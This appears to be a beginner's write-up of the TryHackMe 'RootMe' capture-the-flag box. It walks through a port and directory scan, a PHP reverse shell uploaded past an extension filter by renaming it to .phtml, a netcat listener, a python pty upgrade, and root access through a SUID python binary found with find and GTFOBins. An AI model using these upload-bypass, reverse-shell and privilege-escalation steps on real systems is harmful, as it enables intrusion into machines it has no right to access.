RootMe is an easy level box on THM which covers enumeration of the box, obtaining a reverse shell and abusing SUID binaries to escalate our privileges.
All flags found in the write up will be blurred in order to prevent an easy win for the room. Find the room here.
Enumeration
As with every box, we start with an NMAP scan to see what services are running.
From the NMAP results, we can see that we have the following two services running on the box:
- Port 22 (SSH) — OpenSSH 7.6 (Ubuntu)
- Port 80 (HTTP) — Apache httpd 2.4.29
With a web server running on port 80, let’s check out the site:
When a webserver is running on a target, the first thing I like to do is run some kind of directory brute force against the site to see if we can find any interesting directories:
From Gobuster, we can see that there 5 directories on the site. The two which catch my eye are:
- /uploads
- /panel.
Obtaining Remote Access to the Box (Reverse Shell)
Navigating to http://10.10.115.207/panel looks to be some functionality where we can upload files. Whenever I see that a site allows a user to upload a file, the first thing I try is uploading a PHP Reverse Shell.
I will copy the code for the reverse shell to a file on my desktop call shell.php and upload this to the site. The code for the reverse shell can be found here.
Change the IP and Port to the IP of your local box and the port you want to listen on (choose anything, I go for 9001).
With the PHP code altered to contain the IP of your local box and the port you want to listen on, you also need to make the php script executable by using the following command:
chmod +x shell.php
Now all you need to do is upload the file to the site:
When we try to upload our PHP Reverse Shell we get an error. This looks like the attachment .PHP is not permitted. We have a few options here:
- We could intercept the request with BurpSuite and send it to intruder to bruteforce the extension of the filename till we get a 200 Response.
- Before we try that, we could try some common PHP extensions. If this fails, we try the first option.
Let’s alter our PHP file from shell.php to shell.phtml and try to upload:
Cool! Our reverse shell uploaded successfully with the .PHTML extension.
If you remember from our Gobuster scan, there was also a directory on the box called /uploads. Let’s check that out to see if that’s where our Reverse Shell is stored:
Now we can find where our reverse shell is stored, let’s use netcat to listen on port 9001 to see if our reverse shell will call back to us when we click on the file:
And just like that, we have our reverse shell. When I get access to a box, I like to stabilise the shell to make things easier to navigate on the box. Use the following:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Now have some what of a stable shell, we can find the user.txt flag using the following:
find / -type -iname user.txt 2> /dev/null
- – type f : searches files only.
- – name : name of the file to locate.
- 2>/dev/null : suppresses error.
Abusing SUID Binaries (Privilege Escalation)
Now that we have our initial access on the box and we have found the user.txt flag, we need to find a way to escalate our privileges to root.
Lets see if there are any files on the system who’s SUID bit is set and it is owned by the root user. Files with the SUID bit set when executed are run with the permissions of the owner of the file. So if there is an binary that is owned by root and it has the SUID bit set we could theoretically use this binary to elevate our permissions.
To find SUID binaries, we can run the following command:
find / -user root -perm /4000 2>/dev/null
- / : Scan the entire device
- -type f : Look only for files (No directories)
- -user root : Check if the owner of file is root
- -perm -4000 : Look for files that have minimum 4000 as their privilege. 4000 is the numerical representation for a file who’s SUID bit is set.
- 2>/dev/null: This is not required but by using it, this will clear out any errors found by the find command and write them to NULL. NULL deletes whatever data is sent to it.
What stands out me here is that Python is said to have the SUID bit set. Let’s search GTFOBins. GTFOBins is the best resource whenever we need to exploit a system binary.
A search for python on GTFOBins gives us the following result:
Let’s copy this into our reverse shell:
And just like that, we now have root access and are able to read the root.txt flag.
Now, the box is completed… Rooted ;). This is my first write-up of any kind of CTF, so please feel free to leave me some feedback!
Happy Hacking! :)
